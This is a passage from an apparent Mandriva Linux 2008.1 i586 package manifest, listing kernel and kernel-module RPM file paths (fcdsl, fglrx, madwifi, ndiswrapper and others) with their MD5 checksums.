2008.1/i586/fcdsl2-kernel-server-latest-3.11.07-1.20080528.7mdv2008.1.i586.rpm 1d87348712088b0255359666ef8f6153 2008.1/i586/fcdsl-kernel-2.6.24.5-desktop-1mnb-3.11.07-6mdv2008.1.i586.rpm 80b69080c16e5a78ebe70a345ed18463 2008.1/i586/fcdsl-kernel-2.6.24.5-desktop586-1mnb-3.11.07-6mdv2008.1.i586.rpm 4c87f72614844f03040ed848d912de65 2008.1/i586/fcdsl-kernel-2.6.24.5-laptop-1mnb-3.11.07-6mdv2008.1.i586.rpm f40de27bb1872b27010cc813b09871c0 2008.1/i586/fcdsl-kernel-2.6.24.5-server-1mnb-3.11.07-6mdv2008.1.i586.rpm 4cf3070cc2ed0bf59fb3dea17feec5dc 2008.1/i586/fcdsl-kernel-desktop586-latest-3.11.07-1.20080528.6mdv2008.1.i586.rpm 16b4a4ec66c083c6333d343a9a58463e 2008.1/i586/fcdsl-kernel-desktop-latest-3.11.07-1.20080528.6mdv2008.1.i586.rpm ba94fe67705a57487e1d5f33e8b8788c 2008.1/i586/fcdsl-kernel-laptop-latest-3.11.07-1.20080528.6mdv2008.1.i586.rpm 68f878ddd8781a74c4463405d130a75c 2008.1/i586/fcdsl-kernel-server-latest-3.11.07-1.20080528.6mdv2008.1.i586.rpm 9e6b4013615f745a2d79845448178b8c 2008.1/i586/fcdslsl-kernel-2.6.24.5-desktop-1mnb-3.11.07-6mdv2008.1.i586.rpm 956d20708a6d44f8f03e7e44c1349ea8 2008.1/i586/fcdslsl-kernel-2.6.24.5-desktop586-1mnb-3.11.07-6mdv2008.1.i586.rpm 77e1b559996763f1b42bd067b4244f01 2008.1/i586/fcdslsl-kernel-2.6.24.5-laptop-1mnb-3.11.07-6mdv2008.1.i586.rpm 460d716d2f9d912cd9d992a2890fc4f9 2008.1/i586/fcdslsl-kernel-2.6.24.5-server-1mnb-3.11.07-6mdv2008.1.i586.rpm d804eab32a9132e35190739015bd3038 2008.1/i586/fcdslsl-kernel-desktop586-latest-3.11.07-1.20080528.6mdv2008.1.i586.rpm 57771a9929f5fe8e71edb81dbbda0985 2008.1/i586/fcdslsl-kernel-desktop-latest-3.11.07-1.20080528.6mdv2008.1.i586.rpm 67a6475430480249c5f9d8cce6936883 2008.1/i586/fcdslsl-kernel-laptop-latest-3.11.07-1.20080528.6mdv2008.1.i586.rpm 2168e16021dca95f520fa9f44178eb68 2008.1/i586/fcdslsl-kernel-server-latest-3.11.07-1.20080528.6mdv2008.1.i586.rpm c2581f6d65452e1950f37712c57cfcb4 2008.1/i586/fcdslslusb-kernel-2.6.24.5-desktop-1mnb-3.11.05-7mdv2008.1.i586.rpm 6210f1ca8d3b645b5500bbcc6200e83e 2008.1/i586/fcdslslusb-kernel-2.6.24.5-desktop586-1mnb-3.11.05-7mdv2008.1.i586.rpm 0e75ee4a35dfc0326678ad91999c4043 2008.1/i586/fcdslslusb-kernel-2.6.24.5-laptop-1mnb-3.11.05-7mdv2008.1.i586.rpm e5cb262cc6d88532ece2367ad1473bda 2008.1/i586/fcdslslusb-kernel-2.6.24.5-server-1mnb-3.11.05-7mdv2008.1.i586.rpm 973b7955e14f3859bd6839fe1b95e863 2008.1/i586/fcdslslusb-kernel-desktop586-latest-3.11.05-1.20080528.7mdv2008.1.i586.rpm 1531cf06b806cac7024ea770ea687ff7 2008.1/i586/fcdslslusb-kernel-desktop-latest-3.11.05-1.20080528.7mdv2008.1.i586.rpm b34ab77b2a8723000a96a3f5a2f4302e 2008.1/i586/fcdslslusb-kernel-laptop-latest-3.11.05-1.20080528.7mdv2008.1.i586.rpm e82beb7446adc2e68c4b19411d37e0c3 2008.1/i586/fcdslslusb-kernel-server-latest-3.11.05-1.20080528.7mdv2008.1.i586.rpm 626567c283165f3720edb397b69fee73 2008.1/i586/fcdslusb2-kernel-2.6.24.5-desktop-1mnb-3.11.07-7mdv2008.1.i586.rpm 3111de01c1d9986889cb9e1858945216 2008.1/i586/fcdslusb2-kernel-2.6.24.5-desktop586-1mnb-3.11.07-7mdv2008.1.i586.rpm 06796aa4871d9ede95baa16f8bc9bd51 2008.1/i586/fcdslusb2-kernel-2.6.24.5-laptop-1mnb-3.11.07-7mdv2008.1.i586.rpm 63c96a9761924f7f6d3053da648da7b1 2008.1/i586/fcdslusb2-kernel-2.6.24.5-server-1mnb-3.11.07-7mdv2008.1.i586.rpm aa14ca71bcefbd70a091909fb4088a38 2008.1/i586/fcdslusb2-kernel-desktop586-latest-3.11.07-1.20080528.7mdv2008.1.i586.rpm b055bb1bb958643c4e79fce611dbf749 2008.1/i586/fcdslusb2-kernel-desktop-latest-3.11.07-1.20080528.7mdv2008.1.i586.rpm 70b2c8d31e60f86bf5c54e95fe8d4b93 2008.1/i586/fcdslusb2-kernel-laptop-latest-3.11.07-1.20080528.7mdv2008.1.i586.rpm 1fdde8b30236bc03fd22dff523ae97fa 2008.1/i586/fcdslusb2-kernel-server-latest-3.11.07-1.20080528.7mdv2008.1.i586.rpm 0ef1c5b3b413d17da6bd5218de896a5f 2008.1/i586/fcdslusba-kernel-2.6.24.5-desktop-1mnb-3.11.05-6mdv2008.1.i586.rpm 91f6e9844f56f2c5c45bb79dd8c1f5cb 2008.1/i586/fcdslusba-kernel-2.6.24.5-desktop586-1mnb-3.11.05-6mdv2008.1.i586.rpm 5ebb88adeb0599f642a9967813f6687a 2008.1/i586/fcdslusba-kernel-2.6.24.5-laptop-1mnb-3.11.05-6mdv2008.1.i586.rpm 12ba1baefb80be0f42fdefddc58986db 2008.1/i586/fcdslusba-kernel-2.6.24.5-server-1mnb-3.11.05-6mdv2008.1.i586.rpm acfb78eabc9eddebc5cc143d49053d9b 2008.1/i586/fcdslusba-kernel-desktop586-latest-3.11.05-1.20080528.6mdv2008.1.i586.rpm c024450ab16d24566197653ee45b8935 2008.1/i586/fcdslusba-kernel-desktop-latest-3.11.05-1.20080528.6mdv2008.1.i586.rpm 01e7ba4bd5a8c9f2078aeb860d440601 2008.1/i586/fcdslusba-kernel-laptop-latest-3.11.05-1.20080528.6mdv2008.1.i586.rpm 1d7426d8b771650d1f6017c8641066c3 2008.1/i586/fcdslusba-kernel-server-latest-3.11.05-1.20080528.6mdv2008.1.i586.rpm 289b31d8fa385be5ccdb707bfa0d17ab 2008.1/i586/fcdslusb-kernel-2.6.24.5-desktop-1mnb-3.11.07-6mdv2008.1.i586.rpm e0778dd6f0723962d6a1c761e681ed27 2008.1/i586/fcdslusb-kernel-2.6.24.5-desktop586-1mnb-3.11.07-6mdv2008.1.i586.rpm f520b00d985cfb44420bb625c47f2e99 2008.1/i586/fcdslusb-kernel-2.6.24.5-laptop-1mnb-3.11.07-6mdv2008.1.i586.rpm fbd6c59343aee11bcac5bf3239bec244 2008.1/i586/fcdslusb-kernel-2.6.24.5-server-1mnb-3.11.07-6mdv2008.1.i586.rpm 23964f9e8b80e37febb432debf4023b4 2008.1/i586/fcdslusb-kernel-desktop586-latest-3.11.07-1.20080528.6mdv2008.1.i586.rpm 852c1f921adc04dc616e139fcb635aa3 2008.1/i586/fcdslusb-kernel-desktop-latest-3.11.07-1.20080528.6mdv2008.1.i586.rpm b0983a6e218d4df0ca9461330e670a74 2008.1/i586/fcdslusb-kernel-laptop-latest-3.11.07-1.20080528.6mdv2008.1.i586.rpm e5aa67ae359b5b4c1df57d649c610a48 2008.1/i586/fcdslusb-kernel-server-latest-3.11.07-1.20080528.6mdv2008.1.i586.rpm dea822c6a07493c75fd8c2ed4c514040 2008.1/i586/fcpci-kernel-2.6.24.5-desktop-1mnb-3.11.07-6.1mdv2008.1.i586.rpm c75e4fd7f2b198b9167fde61fb583df2 2008.1/i586/fcpci-kernel-2.6.24.5-desktop586-1mnb-3.11.07-6.1mdv2008.1.i586.rpm b15204f1780d509cd74c5badf82e953f 2008.1/i586/fcpci-kernel-2.6.24.5-laptop-1mnb-3.11.07-6.1mdv2008.1.i586.rpm 68ba8fc1dd0fd1384e6331cc21735bb4 2008.1/i586/fcpci-kernel-2.6.24.5-server-1mnb-3.11.07-6.1mdv2008.1.i586.rpm 18e86309c757a1405cca9605790ca746 2008.1/i586/fcpci-kernel-desktop586-latest-3.11.07-1.20080528.6.1mdv2008.1.i586.rpm dec69cea3fb5a0e0f38994865ac9de09 2008.1/i586/fcpci-kernel-desktop-latest-3.11.07-1.20080528.6.1mdv2008.1.i586.rpm 4a219eccadedb9864204d94fa0ebb6d0 2008.1/i586/fcpci-kernel-laptop-latest-3.11.07-1.20080528.6.1mdv2008.1.i586.rpm 35fe0553edc085ccbacdf43d1d37cb91 2008.1/i586/fcpci-kernel-server-latest-3.11.07-1.20080528.6.1mdv2008.1.i586.rpm c9f06a484e3ce2bce3ae2de292916db4 2008.1/i586/fcusb2-kernel-2.6.24.5-desktop-1mnb-3.11.07-6mdv2008.1.i586.rpm ef49ec632a89a4092366dab3c0f1c012 2008.1/i586/fcusb2-kernel-2.6.24.5-desktop586-1mnb-3.11.07-6mdv2008.1.i586.rpm e597f84534bf5112e1eb432fef8b83d1 2008.1/i586/fcusb2-kernel-2.6.24.5-laptop-1mnb-3.11.07-6mdv2008.1.i586.rpm ee2cff2cbf79f56b2f7b410ee8bda997 2008.1/i586/fcusb2-kernel-2.6.24.5-server-1mnb-3.11.07-6mdv2008.1.i586.rpm 0b2c24f85fbb80c56ddf5a99e8c19e78 2008.1/i586/fcusb2-kernel-desktop586-latest-3.11.07-1.20080528.6mdv2008.1.i586.rpm 8f826856af368b5f28c48dfc321f4408 2008.1/i586/fcusb2-kernel-desktop-latest-3.11.07-1.20080528.6mdv2008.1.i586.rpm 9f9fa56115e8ba25cfe80ce2471e9e7f 2008.1/i586/fcusb2-kernel-laptop-latest-3.11.07-1.20080528.6mdv2008.1.i586.rpm 50d5b61022991468902b9fe14a111e5c 2008.1/i586/fcusb2-kernel-server-latest-3.11.07-1.20080528.6mdv2008.1.i586.rpm b76665745e5bad349553c75b5f4c40cd 2008.1/i586/fcusb-kernel-2.6.24.5-desktop-1mnb-3.11.04-6mdv2008.1.i586.rpm 2ec4479a8b96a751e77765d59726b782 2008.1/i586/fcusb-kernel-2.6.24.5-desktop586-1mnb-3.11.04-6mdv2008.1.i586.rpm e00047c17679b6e514529847586c248c 2008.1/i586/fcusb-kernel-2.6.24.5-laptop-1mnb-3.11.04-6mdv2008.1.i586.rpm 4bd74086b7dd87b3b4ccc623fafe611a 2008.1/i586/fcusb-kernel-2.6.24.5-server-1mnb-3.11.04-6mdv2008.1.i586.rpm 693984e967e2397f2b3a71961ba31e43 2008.1/i586/fcusb-kernel-desktop586-latest-3.11.04-1.20080528.6mdv2008.1.i586.rpm 3201d863ae8dca5ce85b808d038ff01c 2008.1/i586/fcusb-kernel-desktop-latest-3.11.04-1.20080528.6mdv2008.1.i586.rpm 201a0e392dadce37523e8d54fe85c4f8 2008.1/i586/fcusb-kernel-laptop-latest-3.11.04-1.20080528.6mdv2008.1.i586.rpm 019c1d56f82cdcc922d771a65e80222d 2008.1/i586/fcusb-kernel-server-latest-3.11.04-1.20080528.6mdv2008.1.i586.rpm 2a39f3625424bc1fb5ad82724874126e 2008.1/i586/fglrx-kernel-2.6.24.5-desktop-1mnb-8.471-3mdv2008.1.i586.rpm 7493136c2dc0a92a148bd62d8ab95034 2008.1/i586/fglrx-kernel-2.6.24.5-desktop586-1mnb-8.471-3mdv2008.1.i586.rpm 879c753c87c6f41cb66eb20e56a03c87 2008.1/i586/fglrx-kernel-2.6.24.5-laptop-1mnb-8.471-3mdv2008.1.i586.rpm 99bf19a6c1ec9514ce39b0cb8deacb2e 2008.1/i586/fglrx-kernel-2.6.24.5-server-1mnb-8.471-3mdv2008.1.i586.rpm 18f42ae5127c35a0c5b78d1d4682abe6 2008.1/i586/fglrx-kernel-desktop586-latest-8.471-1.20080528.3mdv2008.1.i586.rpm 32e586144c7f50322699222b7c1f79cb 2008.1/i586/fglrx-kernel-desktop-latest-8.471-1.20080528.3mdv2008.1.i586.rpm 270b793b5b3a5d93d2ab3834da7b2cf1 2008.1/i586/fglrx-kernel-laptop-latest-8.471-1.20080528.3mdv2008.1.i586.rpm eb240176a5608038179fa1c57790d9a4 2008.1/i586/fglrx-kernel-server-latest-8.471-1.20080528.3mdv2008.1.i586.rpm 0aeb309f916860da2867c831a83a7d70 2008.1/i586/fxusb_CZ-kernel-2.6.24.5-desktop-1mnb-3.11.06-6mdv2008.1.i586.rpm 7d42119d70f29276d220957be6b81ee7 2008.1/i586/fxusb_CZ-kernel-2.6.24.5-desktop586-1mnb-3.11.06-6mdv2008.1.i586.rpm 4fde26e164ee0f3eb36634a9dc706124 2008.1/i586/fxusb_CZ-kernel-2.6.24.5-laptop-1mnb-3.11.06-6mdv2008.1.i586.rpm cf9fa6f0038664a6c4d69a147aa611a9 2008.1/i586/fxusb_CZ-kernel-2.6.24.5-server-1mnb-3.11.06-6mdv2008.1.i586.rpm a4d3f15110456fbbd3d2e84cfeef7f60 2008.1/i586/fxusb_CZ-kernel-desktop586-latest-3.11.06-1.20080528.6mdv2008.1.i586.rpm a4af0a367b9ddea31b64bcb637bdd467 2008.1/i586/fxusb_CZ-kernel-desktop-latest-3.11.06-1.20080528.6mdv2008.1.i586.rpm 69029f21d2613028f48a2de923468fdf 2008.1/i586/fxusb_CZ-kernel-laptop-latest-3.11.06-1.20080528.6mdv2008.1.i586.rpm d285d3c69a23896537930c8e49a5d486 2008.1/i586/fxusb_CZ-kernel-server-latest-3.11.06-1.20080528.6mdv2008.1.i586.rpm 17a976d38f448264b2750d605193042d 2008.1/i586/fxusb-kernel-2.6.24.5-desktop-1mnb-3.11.06-6mdv2008.1.i586.rpm b6a59291b36dae5a5cf8040ce6ec55c0 2008.1/i586/fxusb-kernel-2.6.24.5-desktop586-1mnb-3.11.06-6mdv2008.1.i586.rpm 691f8e15711f4f0322f9e3be0dda96b8 2008.1/i586/fxusb-kernel-2.6.24.5-laptop-1mnb-3.11.06-6mdv2008.1.i586.rpm 416192c43431bb2d5297bf9610ac4174 2008.1/i586/fxusb-kernel-2.6.24.5-server-1mnb-3.11.06-6mdv2008.1.i586.rpm a221fbda371f5789d54426d4019735bf 2008.1/i586/fxusb-kernel-desktop586-latest-3.11.06-1.20080528.6mdv2008.1.i586.rpm 2eb1b58b8c141375fb46a23356469a2e 2008.1/i586/fxusb-kernel-desktop-latest-3.11.06-1.20080528.6mdv2008.1.i586.rpm 20102128d4bc62d676faf62d8cd709b6 2008.1/i586/fxusb-kernel-laptop-latest-3.11.06-1.20080528.6mdv2008.1.i586.rpm 6e33e85707dc47b468e0dc9061cd1ada 2008.1/i586/fxusb-kernel-server-latest-3.11.06-1.20080528.6mdv2008.1.i586.rpm 30e7b3cc6bd39b0fb33844eb8b1c3e9b 2008.1/i586/hsfmodem-kernel-2.6.24.5-desktop-1mnb-7.68.00.07-1mdv2008.1.i586.rpm 049055a27b1e066975dad0f414f11887 2008.1/i586/hsfmodem-kernel-2.6.24.5-desktop586-1mnb-7.68.00.07-1mdv2008.1.i586.rpm b8ca908e1f3f937502ae283f76165dce 2008.1/i586/hsfmodem-kernel-2.6.24.5-laptop-1mnb-7.68.00.07-1mdv2008.1.i586.rpm 1c09b957e4b6897fdc4735e66f26ee10 2008.1/i586/hsfmodem-kernel-2.6.24.5-server-1mnb-7.68.00.07-1mdv2008.1.i586.rpm 0132175eee4992d9216b47cbd52c04b5 2008.1/i586/hsfmodem-kernel-desktop586-latest-7.68.00.07-1.20080528.1mdv2008.1.i586.rpm 86a15372f4c67fdd96c35f5effeff62d 2008.1/i586/hsfmodem-kernel-desktop-latest-7.68.00.07-1.20080528.1mdv2008.1.i586.rpm c1faeee824cea6836865faaad6e2edf7 2008.1/i586/hsfmodem-kernel-laptop-latest-7.68.00.07-1.20080528.1mdv2008.1.i586.rpm 4df7b33dc98a1b0c6896cece2008b908 2008.1/i586/hsfmodem-kernel-server-latest-7.68.00.07-1.20080528.1mdv2008.1.i586.rpm 330bf21137de945205925107f1b5f853 2008.1/i586/ipw3945-kernel-2.6.24.5-desktop-1mnb-1.2.2-3mdv2008.1.i586.rpm 9f4398a37c3a917dc82c06524cc533da 2008.1/i586/ipw3945-kernel-2.6.24.5-desktop586-1mnb-1.2.2-3mdv2008.1.i586.rpm 522d7818683d48d182368ffb56172d78 2008.1/i586/ipw3945-kernel-2.6.24.5-laptop-1mnb-1.2.2-3mdv2008.1.i586.rpm cf49ba4e85789b80951b521ac8c6cf4a 2008.1/i586/ipw3945-kernel-2.6.24.5-server-1mnb-1.2.2-3mdv2008.1.i586.rpm 57b500876958f6459bdd18695178fece 2008.1/i586/ipw3945-kernel-desktop586-latest-1.2.2-1.20080528.3mdv2008.1.i586.rpm a7c84ca77665957a9dec8348b8d944a6 2008.1/i586/ipw3945-kernel-desktop-latest-1.2.2-1.20080528.3mdv2008.1.i586.rpm 4a328eecbb4cfb50b55178aba8792379 2008.1/i586/ipw3945-kernel-laptop-latest-1.2.2-1.20080528.3mdv2008.1.i586.rpm 61c603e0881cabee93d3943f1a2b4f06 2008.1/i586/ipw3945-kernel-server-latest-1.2.2-1.20080528.3mdv2008.1.i586.rpm 2f99b5b81cd87036cb6ea41e8754156a 2008.1/i586/iwlwifi-kernel-2.6.24.5-desktop-1mnb-1.2.25-5mdv2008.1.i586.rpm 046750496227b1702c85ddcb93728c77 2008.1/i586/iwlwifi-kernel-2.6.24.5-desktop586-1mnb-1.2.25-5mdv2008.1.i586.rpm 2faf59be28e9033047a8e8350f5b8995 2008.1/i586/iwlwifi-kernel-2.6.24.5-laptop-1mnb-1.2.25-5mdv2008.1.i586.rpm 99152a42e80f9d24320b321ae03f5618 2008.1/i586/iwlwifi-kernel-2.6.24.5-server-1mnb-1.2.25-5mdv2008.1.i586.rpm 0c550421fd1e70f1e8b8e2bb8711b393 2008.1/i586/iwlwifi-kernel-desktop586-latest-1.2.25-1.20080528.5mdv2008.1.i586.rpm d8c511dc3f33a1c4a0752313a278b2ca 2008.1/i586/iwlwifi-kernel-desktop-latest-1.2.25-1.20080528.5mdv2008.1.i586.rpm 2ad805780ee6b47bfb21a710b5a0a52c 2008.1/i586/iwlwifi-kernel-laptop-latest-1.2.25-1.20080528.5mdv2008.1.i586.rpm 7e0f96ff4fab41f81f88308bc4cab8d0 2008.1/i586/iwlwifi-kernel-server-latest-1.2.25-1.20080528.5mdv2008.1.i586.rpm 7a767bb8b4455c411990163df3f01ed2 2008.1/i586/kernel-2.6.24.5-1mnb-1-1mnb1.i586.rpm 659285c4ca7d557982041ccda7645ce7 2008.1/i586/kernel-desktop-2.6.24.5-1mnb-1-1mnb1.i586.rpm a362798d60f4a7d52674e43a00fbe233 2008.1/i586/kernel-desktop586-2.6.24.5-1mnb-1-1mnb1.i586.rpm 0a498c6d3a2a40220e4dbe49dc7ff2f5 2008.1/i586/kernel-desktop586-devel-2.6.24.5-1mnb-1-1mnb1.i586.rpm 198dfc866444e0f8d3d787210b4cc47b 2008.1/i586/kernel-desktop586-devel-latest-2.6.24.5-1mnb1.i586.rpm db8e1e452c1c860364750b8e3480fa73 2008.1/i586/kernel-desktop586-latest-2.6.24.5-1mnb1.i586.rpm 7d790d6d2d1578a14330398fce039e11 2008.1/i586/kernel-desktop-devel-2.6.24.5-1mnb-1-1mnb1.i586.rpm 2a56236901ecb1e264e1142c5fdb3e02 2008.1/i586/kernel-desktop-devel-latest-2.6.24.5-1mnb1.i586.rpm 839f0d0da3b9793640121a32fdc8c34c 2008.1/i586/kernel-desktop-latest-2.6.24.5-1mnb1.i586.rpm ff1ad0f08842c5b497812f3ce184fd2f 2008.1/i586/kernel-doc-2.6.24.5-1mnb1.i586.rpm 3c8c8a3bc9aea66f8a81bec3f8600719 2008.1/i586/kernel-laptop-2.6.24.5-1mnb-1-1mnb1.i586.rpm aa3feaded12d06c753d3b1673e5d4448 2008.1/i586/kernel-laptop-devel-2.6.24.5-1mnb-1-1mnb1.i586.rpm 97d7753eccfdcd62efcae8f591ea4c4d 2008.1/i586/kernel-laptop-devel-latest-2.6.24.5-1mnb1.i586.rpm 233697bfc85f426ec91ada4fa355d7a0 2008.1/i586/kernel-laptop-latest-2.6.24.5-1mnb1.i586.rpm 8e90c7f0cc01fdb06df626231210c5bf 2008.1/i586/kernel-server-2.6.24.5-1mnb-1-1mnb1.i586.rpm 47197aec0a8938d4db0fb67bb3316448 2008.1/i586/kernel-server-devel-2.6.24.5-1mnb-1-1mnb1.i586.rpm f69ae893b9893eefe14447e28be8564e 2008.1/i586/kernel-server-devel-latest-2.6.24.5-1mnb1.i586.rpm b4556342757e9ff088ceb5cb600cc0e6 2008.1/i586/kernel-server-latest-2.6.24.5-1mnb1.i586.rpm 3222dacd975c492491c32f270112bf4e 2008.1/i586/kernel-source-2.6.24.5-1mnb-1-1mnb1.i586.rpm 14c191bb923c4763d11c9b0509fd4678 2008.1/i586/kernel-source-latest-2.6.24.5-1mnb1.i586.rpm 62d7a034b309d46e5ab43912f0a77828 2008.1/i586/kqemu-kernel-2.6.24.5-desktop-1mnb-1.3.0pre11-15.i586.rpm e480d6dcf8054ac117b7aeee8021cd38 2008.1/i586/kqemu-kernel-2.6.24.5-desktop586-1mnb-1.3.0pre11-15.i586.rpm 943da19f5de19623c5d3ba51ba19e6ce 2008.1/i586/kqemu-kernel-2.6.24.5-laptop-1mnb-1.3.0pre11-15.i586.rpm d4d8721e757c4b3ba59476654a0b0d0e 2008.1/i586/kqemu-kernel-2.6.24.5-server-1mnb-1.3.0pre11-15.i586.rpm be6d6228246e2b666e46a56ad44dc1d6 2008.1/i586/kqemu-kernel-desktop586-latest-1.3.0pre11-1.20080528.15.i586.rpm 428a5cdb3a30efdcafd374f646214fc1 2008.1/i586/kqemu-kernel-desktop-latest-1.3.0pre11-1.20080528.15.i586.rpm c13f4934df266eaa96edcd4ebe276d5d 2008.1/i586/kqemu-kernel-laptop-latest-1.3.0pre11-1.20080528.15.i586.rpm ea1a437cfb4b3e0249f5517592137d5a 2008.1/i586/kqemu-kernel-server-latest-1.3.0pre11-1.20080528.15.i586.rpm 0b7db15226ce174d819d1c1fbc121aa1 2008.1/i586/libafs-kernel-2.6.24.5-desktop-1mnb-1.4.6-2mdv2008.1.i586.rpm 8f725b9a8b2e0995046f1187f15a05de 2008.1/i586/libafs-kernel-2.6.24.5-desktop586-1mnb-1.4.6-2mdv2008.1.i586.rpm c4cd8839f795ceb8ac3521c2efcc716e 2008.1/i586/libafs-kernel-2.6.24.5-laptop-1mnb-1.4.6-2mdv2008.1.i586.rpm f8624a5ad588572f382be952c9b6e616 2008.1/i586/libafs-kernel-2.6.24.5-server-1mnb-1.4.6-2mdv2008.1.i586.rpm 3d157850c2fec26c6e6f813b9de66329 2008.1/i586/libafs-kernel-desktop586-latest-1.4.6-1.20080528.2mdv2008.1.i586.rpm ed37f6494bfae9bd43b7527f96030b54 2008.1/i586/libafs-kernel-desktop-latest-1.4.6-1.20080528.2mdv2008.1.i586.rpm 3acffda77004d78a459835f85afcc361 2008.1/i586/libafs-kernel-laptop-latest-1.4.6-1.20080528.2mdv2008.1.i586.rpm 5ebabd1ff5c893ee0aaa297dd25e9945 2008.1/i586/libafs-kernel-server-latest-1.4.6-1.20080528.2mdv2008.1.i586.rpm 8d17c8c9138093c42cb9cba36fe2e306 2008.1/i586/lirc-kernel-2.6.24.5-desktop-1mnb-0.8.2-1.20080310.2mdv2008.1.i586.rpm 601e777e0d574324e3553d0515ff306e 2008.1/i586/lirc-kernel-2.6.24.5-desktop586-1mnb-0.8.2-1.20080310.2mdv2008.1.i586.rpm 3081ac857f6a23051c4896e1c245b603 2008.1/i586/lirc-kernel-2.6.24.5-laptop-1mnb-0.8.2-1.20080310.2mdv2008.1.i586.rpm 14bbec5e57946bef6b10af6d5c72a9a2 2008.1/i586/lirc-kernel-2.6.24.5-server-1mnb-0.8.2-1.20080310.2mdv2008.1.i586.rpm 235653b39eaa7e40c4e68afbc11d798b 2008.1/i586/lirc-kernel-desktop586-latest-0.8.2-1.20080528.1.20080310.2mdv2008.1.i586.rpm 804c644abcdcae6458ab46eb3b0b724b 2008.1/i586/lirc-kernel-desktop-latest-0.8.2-1.20080528.1.20080310.2mdv2008.1.i586.rpm d6613789c5731d9ceccf6d6c06d198b4 2008.1/i586/lirc-kernel-laptop-latest-0.8.2-1.20080528.1.20080310.2mdv2008.1.i586.rpm 823d62147230e86c15a6324c7609c173 2008.1/i586/lirc-kernel-server-latest-0.8.2-1.20080528.1.20080310.2mdv2008.1.i586.rpm 690d4c67a816208984400b08a8939eaf 2008.1/i586/lzma-kernel-2.6.24.5-desktop-1mnb-4.43-21mdv2008.1.i586.rpm a9d22211e1f8a849579b22004608813d 2008.1/i586/lzma-kernel-2.6.24.5-desktop586-1mnb-4.43-21mdv2008.1.i586.rpm 008c9501d323350cd4ce97341faa289c 2008.1/i586/lzma-kernel-2.6.24.5-laptop-1mnb-4.43-21mdv2008.1.i586.rpm 22eb8cde20fbd226777cba719d2d6e6a 2008.1/i586/lzma-kernel-2.6.24.5-server-1mnb-4.43-21mdv2008.1.i586.rpm f3a0faac4beb123878d9cf9d57fe4d4e 2008.1/i586/lzma-kernel-desktop586-latest-4.43-1.20080528.21mdv2008.1.i586.rpm 690f1a60101868e216d6835c1997c6a1 2008.1/i586/lzma-kernel-desktop-latest-4.43-1.20080528.21mdv2008.1.i586.rpm 326ddcd1248c85dbe820332393f52afa 2008.1/i586/lzma-kernel-laptop-latest-4.43-1.20080528.21mdv2008.1.i586.rpm 964de3e166992cfcf9ac6830a063e878 2008.1/i586/lzma-kernel-server-latest-4.43-1.20080528.21mdv2008.1.i586.rpm 17a1d27c6b7ffb5c5de62b70df9d553a 2008.1/i586/m560x-kernel-2.6.24.5-desktop-1mnb-0.4.0-0.20080229.1mdv2008.1.i586.rpm c16ad334ef0c8fc79fa832f0fba3df94 2008.1/i586/m560x-kernel-2.6.24.5-desktop586-1mnb-0.4.0-0.20080229.1mdv2008.1.i586.rpm 5f18cf1e772ac43fdf9b24244df31987 2008.1/i586/m560x-kernel-2.6.24.5-laptop-1mnb-0.4.0-0.20080229.1mdv2008.1.i586.rpm f43685401fe2d16cccdf8d4189906a0a 2008.1/i586/m560x-kernel-2.6.24.5-server-1mnb-0.4.0-0.20080229.1mdv2008.1.i586.rpm 82e5b93686e22770ce334602c630924f 2008.1/i586/m560x-kernel-desktop586-latest-0.4.0-1.20080528.0.20080229.1mdv2008.1.i586.rpm 0eeebd49428af4cd6d971667ad7dc35e 2008.1/i586/m560x-kernel-desktop-latest-0.4.0-1.20080528.0.20080229.1mdv2008.1.i586.rpm 09f9fb2c78476009daa5016b43cbb52f 2008.1/i586/m560x-kernel-laptop-latest-0.4.0-1.20080528.0.20080229.1mdv2008.1.i586.rpm 3dd1466c1941b23f9cb17b51c8ac5ee3 2008.1/i586/m560x-kernel-server-latest-0.4.0-1.20080528.0.20080229.1mdv2008.1.i586.rpm 8472a1fb3ae96b2d5ee5114729cb0498 2008.1/i586/madwifi-kernel-2.6.24.5-desktop-1mnb-0.9.3.3-5.r3114mdv2008.1.i586.rpm 7a9fab20252ac0f20ce97e50bdc16b25 2008.1/i586/madwifi-kernel-2.6.24.5-desktop586-1mnb-0.9.3.3-5.r3114mdv2008.1.i586.rpm 37d53485f7617ea1edcf778f8cb2a3a1 2008.1/i586/madwifi-kernel-2.6.24.5-laptop-1mnb-0.9.3.3-5.r3114mdv2008.1.i586.rpm df9e1f2b8f77206103672611be85ccbf 2008.1/i586/madwifi-kernel-2.6.24.5-server-1mnb-0.9.3.3-5.r3114mdv2008.1.i586.rpm d856af55508825344a3776eb8a06ad90 2008.1/i586/madwifi-kernel-desktop586-latest-0.9.3.3-1.20080528.5.r3114mdv2008.1.i586.rpm 88e63842dde53457ddbe48b89b1235a9 2008.1/i586/madwifi-kernel-desktop-latest-0.9.3.3-1.20080528.5.r3114mdv2008.1.i586.rpm 8d0ba1dcce9cddc83eb54e881ed99a13 2008.1/i586/madwifi-kernel-laptop-latest-0.9.3.3-1.20080528.5.r3114mdv2008.1.i586.rpm cf57365157e72a40798beeed953e63df 2008.1/i586/madwifi-kernel-server-latest-0.9.3.3-1.20080528.5.r3114mdv2008.1.i586.rpm 0c0710a46470e0e83ec1141be5a13c6c 2008.1/i586/ndiswrapper-kernel-2.6.24.5-desktop-1mnb-1.52-2mdv2008.1.i586.rpm 613df67e53f9763fad34a1b97d7067b3 2008.1/i586/ndiswrapper-kernel-2.6.24.5-desktop586-1mnb-1.52-2mdv2008.1.i586.rpm 6915d4ebb569f26de748acdd31b7b05b 2008.1/i586/ndiswrapper-kernel-2.6.24.5-laptop-1mnb-1.52-2mdv2008.1.i586.rpm f3ab74b129b22daa3c008be7a8ff0857 2008.1/i586/ndiswrapper-kernel-2.6.24.5-server-1mnb-1.52-2mdv2008.1.i586.rpm 5956fe6b110dcdeb006ef335461357b4 2008.1/i586/ndiswrapper-kernel-desktop586-latest-1.52-1.20080528.2mdv2008.1.i586.rpm e293edab3e85e85676c24e64e1db3207 2008.1/i586/ndiswrapper-kernel-desktop-latest-1.52-1.20080528.2mdv2008.1.i586.rpm 3035dcfd978292155e3c80c6b7780280 2008.1/i586/ndiswrapper-kernel-laptop-latest-1.52-1.20080528.2mdv2008.1.i586.rpm bb178274dfd0e4ca62f1eaea64171d44 2008.1/i586/ndiswrapper-kernel-server-latest-1.52-1.20080528.2mdv2008.1.i586.rpm 46e24a32fece4cd312f3d1daa7866074 2008.1/i586/nvidia71xx-kernel-2.6.24.5-desktop-1mnb-71.86.04-4mdv2008.1.i586.rpm 864ed3a8c14aa20a31ab44d0e8253521 